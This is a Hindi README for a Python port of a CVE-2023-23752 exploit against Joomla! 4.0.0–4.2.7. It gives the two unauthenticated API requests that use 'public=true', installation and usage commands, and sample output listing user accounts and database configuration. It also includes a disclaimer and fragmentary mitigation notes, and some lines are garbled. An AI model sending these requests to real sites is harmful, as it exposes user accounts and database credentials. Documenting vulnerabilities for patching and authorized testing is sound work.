
CVE-2023-23752 शोषण का पायथन पोर्ट — Joomla! < 4.2.8 बिना प्रमाणीकरण के सूचना प्रकटीकरण (उपयोगकर्ता सूची + DB क्रेडेंशियल लीक)
⚠️ अस्वीकरण: यह उपकरण केवल शैक्षणिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए है। इसका उपयोग केवल उन सिस्टमों के विरुद्ध करें जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। अनधिकृत उपयोग अवैध है।
Joomla! सबसे व्यापक रूप से उपयोग किए जाने वाले ओपन-सोर्स कंटेंट मैनेजमेंट सिस्टम (CMS) में से एक है। संस्करण 4.0.0 से 4.2.7 तक दो API एंडपॉइंट उचित एक्सेस नियंत्रण के बिना उजागर होते हैं, जिससे एक अनधिकृत हमलावर संवेदनशील जानकारी प्राप्त कर सकता है: पंजीकृत उपयोगकर्ता खाते और, कमजोर कॉन्फ़िगरेशन में, साइट का डेटाबेस क्रेडेंशियल।
यह कमजोरी Zewei Zhang (NSFOCUS TIANJI Lab) द्वारा खोजी गई और Joomla! प्रोजेक्ट को सूचित की गई, जिसने संस्करण 4.2.8 में पैच जारी किया। इसे CVE-2023-23752 निर्दिष्ट किया गया।
इस रिपॉजिटरी में ACCEIS द्वारा जारी मूल Ruby एक्सप्लॉइट का Python पोर्ट शामिल है।
| क्षेत्र | मान |
|---|---|
| CVE | CVE-2023-23752 |
| प्रभावित | Joomla! 4.0.0 – 4.2.7 |
| प्रकार | अनुचित एक्सेस नियंत्रण / सूचना प्रकटीकरण |
| विशेषाधिकार | कोई नहीं (बिना प्रमाणीकरण के) |
| प्रभाव | उपयोगकर्ता खातों और DB क्रेडेंशियल का प्रकटीकरण |
| पैच | Joomla! 4.2.8 (2023 में जारी) |
Joomla के REST API वेबसर्विस एंडपॉइंट को डेटा लौटाने से पहले प्रमाणीकरण और एक्सेस जाँच लागू करनी चाहिए। प्रभावित संस्करणों में, दो एंडपॉइंट यह जाँच सही ढंग से नहीं करते हैं जब उन्हें public=true क्वेरी पैरामीटर के साथ बुलाया जाता है, तो वे अनुरोध को एक अनाम "सार्वजनिक" एक्सेस स्तर से आया हुआ मानते हैं जिसे केवल गैर-संवेदनशील डेटा उजागर करना चाहिए — लेकिन इसके बजाय आंतरिक जानकारी लीक करता है।
GET /api/index.php/v1/users?public=true
GET /api/index.php/v1/config/application?public=true
स्क्रिप्ट निम्नलिखित चरणों को स्वचालित करती है:
1. Send GET request to /api/index.php/v1/users?public=true
2. Parse the JSON:API response and extract user records
3. Send GET request to /api/index.php/v1/config/application?public=true
4. Parse the JSON:API response and extract site + database configuration
5. Print both datasets to the console
किसी भी बिंदु पर कोई प्रमाणीकरण, सत्र या CSRF टोकन की आवश्यकता नहीं है — पूरा हमला दो अनधिकृत GET अनुरोध है।
requestspip install requests --break-system-packages
git clone https://github.com/BardLaudian/CVE-2023-23752.git
cd CVE-2023-23752
pip install requests --break-system-packages
usage: CVE-2023-23752.py [-h] url
positional arguments:
url Base URL of the target, e.g. http://dev.devvortex.htb
options:
-h, --help show this help message and exit
python3 CVE-2023-23752.py http://127.0.0.1:4242
python3 CVE-2023-23752.py http://dev.devvortex.htb
=== Users ===
[123] Administrator (admin) - [email protected] - ['Super Users']
=== Site info ===
Site name: My Site
Editor: tinymce
Captcha: 0
Access: 1
Debug status: False
=== Database info ===
DB type: mysqli
DB host: localhost
DB user: joomla_user
DB password: ********
DB name: joomla_db
DB prefix: sd8f2_
DB encryption: 0
/api/index.php/* तक यदि तुरंत अपग्रेड करना संभव नहीं है।/api/index.php/v1/ वेबसर्विस पथों के लिए अनधिकृत अनुरोधों के लिए।